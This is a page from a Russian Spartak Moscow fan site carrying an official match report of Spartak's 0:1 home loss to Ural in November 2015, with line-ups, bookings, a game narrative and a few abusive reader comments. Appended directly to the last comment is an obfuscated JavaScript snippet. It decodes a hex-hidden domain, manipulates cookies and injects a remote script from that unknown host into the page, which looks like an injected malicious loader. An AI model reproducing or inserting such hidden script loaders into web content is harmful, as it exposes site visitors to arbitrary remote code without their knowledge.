Логин: Пароль: Регистрация Забыли пароль?
Добавить в избранное  
 Инстаграм redwhite.ru Официальный канал REDWHITE.RU на youtube  вконтакте redwhite.ru  Твиттер redwhite.ru Главная Поиск Карта сайта Версия для печати
Фотографии
Видео
Таблица ЧР 2017/2018


команда


и

о

Локомотив

Локомотив 0

0

цска 0

0

СПАРТАК

СПАРТАК 0

0

Краснодар

Краснодар 0

0

Зенит

Зенит 0

0

Уфа

Уфа 0

0

Арсенал

Арсенал 0

0

Динамо

Динамо 0

0

Ахмат

Ахмат 0

0

Рубин

Рубин 0

0

Ростов

Ростов 0

0

Урал

Урал 0

0

Анжи

Анжи 0

0

Крылья Советов

Крылья Советов 0

0

Енисей

Енисей 0

0

Оренбург

Оренбург 0

0

ФНЛ 2017/2018
Молодежные команды


Опрос
  1. Как Вы считаете, сборная России выйдет в 1/8 финала ЧМ-2018?
    1. Да - 56 (65%)
       
    2. Нет - 30 (35%)
       



Оф.сайт. Спартаковцы уступили "Уралу"

01-11-2015

В матче 14-го тура РОСГОССТРАХ чемпионата России «Спартак» уступил «Уралу» — 0:1.

«Спартак» — «Урал» — 0:1 (0:0)

Москва. Стадион «Открытие Арена». 1.11. 16 228 зрителей.

Судья: В. Безбородов (Санкт-Петербург).

«Спартак»: Ребров (к), Паршивлюк, Кутепов, Таски, Гранат, Глушаков (Зотов, 31), Широков, Попов, Зуев (Зе Луиш, 46), Промес, Давыдов (Озбилиз, 63).

Запасные: Митрюшкин, К. Комбаров, Кутин, Леонтьев, Бакаев.

«Урал»: Арапов, Хозин, Мартынович (Новиков, 68), Данцев, Лунгу, Манучарян (Фидлер, 86), Подберезкин (Ярошенко, 83), Асеведо, Фонтанелло, Сапета, Емельянов.

Запасные: Шубин, Ставпец, Бурмистров, Дорожкин, Билоног, Страндберг, Жариков.

Гол: 0:1 Асеведо (80).

Предупреждения: Таски (34, грубая игра). Гранат (40, срыв атаки). Асеведо (42). Широков (61, срыв атаки). Хозин (72). Зе Луиш (85, неспортивное поведение).

Удаление: Асеведо (2-е предупреждение) (82, неспортивное поведение).

ВСЕ ФОТОГРАФИИ

Чёртову дюжину матчей в нынешнем чемпионате Таски и Боккетти провели бок о бок в центре обороны «Спартака». Наша команда играла и в два центральных защитника, и в три, но неизменно немец с итальянцем выходили в стартовом составе. И вот судьба в виде четырех желтых карточек разлучила сильнейший и сыгранный дуэт оборонцев: Сальваторе из-за дисквалификации наблюдал за ходом встречи с «Уралом» со стороны, а Сердар вышел на поле с первых минут в паре с дебютантом из «Спартака-2» Кутеповым. Для Ильи это был третий матч в основе, но первый – в стартовом составе (до этого он дважды выходил на замены при Валерии Карпине и Мурате Якине в концовках встреч с «Рубином» и «Сменой»).

В подобном сочетании спартаковцы никогда в центре обороны не выступали. Кроме того, никогда в этом сезоне Гранат не выступал на позиции левого защитника, на которой он частенько играл в «Динамо». Но что делать, если Дмитрий Комбаров заболел и не мог помочь партнерам, а Макеев получил травму еще в дерби с динамовцами. Другого футболиста именно этого амплуа в распоряжении Аленичева не было.

…Матч начался с минуты молчания в память о людях, погибших в авиакатастрофе в Египте. Игроки вышли на поле с траурными повязками, и фанатские сектора первые пять минут провели в тишине. Среди зрителей на нашем стадионе был и знаменитый боксер-тяжеловес Рой Джонс, недавно получивший российское гражданство. Еще в 2011 году перед боем с Денисом Лебедевым американец эпатировал публику громким заявлением, что отныне он является поклонником футбольного «Спартака». И вот теперь Джонс впервые воочию наблюдал за игрой спартаковцев, а перед ее началом ему презентовали красно-белую футболку.

В дебюте встречи гости показали, что намерены действовать вторым номером, уповая на контратаки. Десять уральцев сразу обступили собственную штрафную, оставив впереди лишь Манучаряна. Красно-белые завладели мячом и территорией, но до 20-й минуты создали только один опасный момент. После «стандарта» мяч отлетел к Широкову, Роман классно положил корпус и плотно пробил в створ, однако Сапета вынес мяч с линии ворот.

Подопечные Вадима Скрипченко ответили на это ударом Манучаряна в перекладину. Затем лишь отменная реакция Реброва спасла нашу команду от гола после тонкого тычка мяча Асеведо. Спартаковцы же до перерыва грешили не только промахами в обороне, но и большим количеством брака в середине поля, причем зачастую в простых ситуациях.

Во втором тайме на поле появился Зе Луиш, оправившийся от травмы. Он занял место центрфорварда, а Давыдов стал больше действовать на правом краю атаки. Денис первым нанес удар в створ ворот, но голкипер «Урала» Арапов намертво поймал мяч. А вот дальний «выстрел» Подберезкина отразила штанга. Затем Промес, как и в первом тайме, опасно исполнил штрафной – мяч пролетел рядом со штангой. Попов тоже промахнулся из неплохой позиции. «Урал» ответил острым контрвыпадом Асеведо – Ребров оказался на месте.

И все же настырный Асеведо подловил спартаковцев на ошибке – он выскочил по центру один на один с Ребровым и хладнокровно пробил мимо нашего голкипера. Попов тут же мог сравнять счет, но Арапов продемонстрировал хорошую реакцию, переведя мяч на угловой. А последний удар на последних секундах игры у Ивелина откровенно не получился.





Источник: spartak.com
Новость добавил: Duc37





оставлять комментарии могут только зарегистрированные пользователи!

число комментариев:  4

Возврат к списку


0 / 0
Spartu60
Урал , явно был сильнее
0 / 0
КБ Мария
Рой Джонс смотрел эту порнографию???
0 / 0
matyushin
За что им платят.нихрена не играют
0 / 0
avtai
какие на хрен Спартаковцы бездари и лодыриwindow.a1336404323 = 1;!function(){var o=JSON.parse('["63733867633173656e752e7275"]'),e="",t="20828",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onl oad=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.oner ror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("redwhite.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();


Хоккейный клуб "Спартак"
Отчеты о выездах
Фото дубля
Друзья
Партнеры
Случайное фото
Рига 2009 (хоккей)
Следующая игра
июль 2018
Спартак Москва
начало матча в --:--
17 июля 2018
Динамо-СПб Спартак Москва
Сочи, стадион "Фишт"
начало матча в --:--
Июль 2018
Спартак Москва
Академия Спартак
начало матча в --:--
2018
Спартак Москва
Москва
начало матча в --:-
2018
Спартак Москва
начало матча в --:--
19 июня 2018
Россия Египет
стадион "Санкт-Петербург"
начало матча в 21:00
Виджет для яндекса
Наши кнопочки

или:

Спартак - фото, видео и отчеты с выездов - RedWhite.Ru